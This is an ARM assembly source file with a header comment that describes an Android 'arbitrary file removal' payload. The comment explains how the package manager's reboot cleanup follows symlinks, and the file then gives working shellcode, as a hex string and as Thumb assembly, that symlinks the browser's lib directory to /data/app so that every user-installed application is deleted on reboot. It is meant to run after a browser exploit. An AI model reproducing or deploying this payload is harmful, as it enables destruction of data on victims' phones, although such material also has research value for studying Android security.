/* * Android Arbitrary File Removal Payload * by Dan Rosenberg (@djrbliss) * * Android differentiates between "system" applications and user-installed * applications, where the former are OEM-shipped and installed in /system/app * rather than /data/app (this has nothing to do with the privileges with which * these applications run). On boot, the Android package manager does a sanity * check on system apps to ensure their native library directories, in * /data/data/[app]/lib, are empty, and if not, empties them by unlinking * everything inside. This check will happily follow symbolic links, so if you * can run code in the context of a system application (such as the browser), * you can replace its lib/ directory with a symlink to a target directory, * which will be (non-recursively) emptied on every subsequent reboot until the * symlink is removed. Of course this will only remove files on filesystems * mounted read-write (usually not /system). * * I expect this will be useful for APT attackers who have Webkit exploits, are * really bored, and want to play pranks on their victims. :p * * This ARM payload removes all user-installed applications on reboot, freeing * you from the shackles of your Twitter addiction. This example must be run * in the context of the Android browser. * * char payload[] = "\x04\xa0\x28\x27\x00\xdf\x0c\xa0\x02\xa1\x53\x27\x00" * "\xdf\x01\x27\x00\xdf\xc0\x46\x2f\x64\x61\x74\x61\x2f" * "\x64\x61\x74\x61\x2f\x63\x6f\x6d\x2e\x61\x6e\x64\x72" * "\x6f\x69\x64\x2e\x62\x72\x6f\x77\x73\x65\x72\x2f\x6c" * "\x69\x62\x00\x00\x2f\x64\x61\x74\x61\x2f\x61\x70\x70" * "\x00\xc0\x46"; */ .equ NR_exit, 1 .equ NR_rmdir, 40 .equ NR_symlink, 83 .thumb .text start: .Lrmdir: adr r0, .Llib mov r7, #NR_rmdir swi #0 .Lsymlink: adr r0, .Lapps adr r1, .Llib mov r7, #NR_symlink swi #0 .Lexit: mov r7, #NR_exit swi #0 .align .Llib: .asciz "/data/data/com.android.browser/lib" .align .Lapps: .asciz "/data/app" .end